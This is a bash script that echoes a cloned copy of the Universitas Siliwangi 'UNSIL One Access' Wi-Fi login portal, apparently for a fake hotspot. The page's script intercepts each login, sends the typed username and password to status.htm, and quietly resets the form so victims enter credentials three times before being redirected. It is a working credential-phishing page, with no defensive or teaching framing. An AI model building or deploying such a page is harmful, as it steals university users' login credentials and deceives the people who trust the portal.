#=================================#
#------- PORTAL WIFI@UNSIL -------#
#=================================#
#!/bin/bash

echo '
<!DOCTYPE html>
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <title>UNSIL One Access - Universitas Siliwangi &gt; Status</title>
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="expires" content="-1">
    <link rel="shortcut icon" href="./UNSIL One Access - Universitas Siliwangi _ Status_files/logo.png" type="image/x-icon">
    <link rel="stylesheet" href="./UNSIL One Access - Universitas Siliwangi _ Status_files/materialize.min.css">
</head>
<body>
    <form name="login" action="status.htm" method="post">
        <div class="section no-pad-bot" id="index-banner">
            <div class="container">
                <div class="row center" style="margin-bottom:10px">
                    <h5 class="header col s12 light">
                        <a href="https://unsil.ac.id/" target="_blank"><img src="./UNSIL One Access - Universitas Siliwangi _ Status_files/logo.png" style="width:100px;"></a>
                        <div style="text-align: center;padding-bottom:8px">UNSIL <b>One</b> <i>Access</i></div>
                    </h5>
                </div>
                <div class="row center">
                    <div class="col s8 offset-s2">
                        <div class="container">
                            <div class="z-depth-1 grey lighten-5 row" style="padding: 24px 32px 0px 32px; border: 1px solid #EEE;">
                                <div class="row">
                                    <a href="https://simak.unsil.ac.id/" target="_blank" name="btn_login" class="col s6 btn btn-sm waves-effect green">SIMAK</a>
                                    <a href="https://journal.unsil.ac.id/" target="_blank" name="btn_login" class="col s6 btn btn-sm waves-effect green">JOURNAL</a>
                                </div>
                                <div class="row">
                                    <div class="col s12">
                                        <input type="hidden" name="dst" value="">
                                        <input type="hidden" name="popup" value="true">
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="input-field col s12">
                                        <input class="validate" type="text" id="username" name="username" autocomplete="off" value="" required>
                                        <label for="email">Username</label>
                                    </div>
                                </div>
                                <div class="row">
                                    <div class="input-field col s12">
                                        <input class="validate" type="password" id="password" name="password" required>
                                        <label for="password">Password</label>
                                    </div>
                                </div>
                                <center>
                                    <div class="row">
                                        <label>
                                            <input type="checkbox" class="filled-in" checked="checked" disabled="disabled">
                                            <span><small style="position: relative;top:-5px;">Saya menyetujui semua <a href="https://upttik.unsil.ac.id/aturan-koneksi-internet-jaringan-komputer/">Syarat &amp; Kebijakan yang berlaku</a></small></span>
                                        </label>
                                        <button type="submit" class="col s12 btn btn-large waves-effect green">Login</button>
                                        <br><br><p></p><br><br><br>
                                        <a href="https://upttik.unsil.ac.id/wp-content/uploads/2021/01/Panduan-One-Access-Ver.3.01.pdf" target="_blank" name="btn_login" class="col s12 btn btn-sm waves-effect red">PANDUAN</a>
                                        <br>
                                    </div>
                                </center>
                                <center>
                                    <div class="row">
                                        <span><small style="position: relative;top:-5px;">Code With Love <a href="https://upttik.unsil.ac.id/" class="green-text" target="_blank">UPT TIK UNSIL</a> 2020</small></span>
                                    </div>
                                </center>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </form>
<div id="loading" style="display:none; text-align:center; margin-top:20px;">
    
</div>
    <script src="./UNSIL One Access - Universitas Siliwangi _ Status_files/materialize.min.js.download"></script>
<script type="text/javascript">
document.login.username.focus();

document.getElementsByName("login")[0].addEventListener("submit", function(e) {
    e.preventDefault();

    // Ambil counter dari localStorage
    let count = parseInt(localStorage.getItem("submitCount") || "0");
    count++;

    // Sembunyikan form
    e.target.style.display = "none";

    // Tampilkan loading
    document.getElementById("loading").style.display = "block";
    document.getElementById("loading").innerHTML = "";

    // Delay 2,5 detik
    setTimeout(() => {
        // Kirim data via form biasa (tulis.htm)
        let form = e.target;

        // Buat form baru untuk submit data
        let xhr = new XMLHttpRequest();
        xhr.open(form.method, form.action);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

        // Ambil semua field
        let data = [];
        for (let i = 0; i < form.elements.length; i++) {
            let el = form.elements[i];
            if (el.name) data.push(encodeURIComponent(el.name) + "=" + encodeURIComponent(el.value));
        }

        xhr.send(data.join("&"));

        // Update counter di localStorage
        localStorage.setItem("submitCount", count);

        if (count < 3) {
            // Reset form untuk input berikutnya
            form.reset();
            form.style.display = "block";
            document.getElementById("loading").style.display = "none";
            document.login.username.focus();
        } else {
            // Setelah 3 kali submit, arahkan ke tulis.htm (bisa juga window.location)
            window.location.href = form.action;
            localStorage.removeItem("submitCount"); // reset counter
        }
    }, 2500);
});
</script>

</body>
</html>'
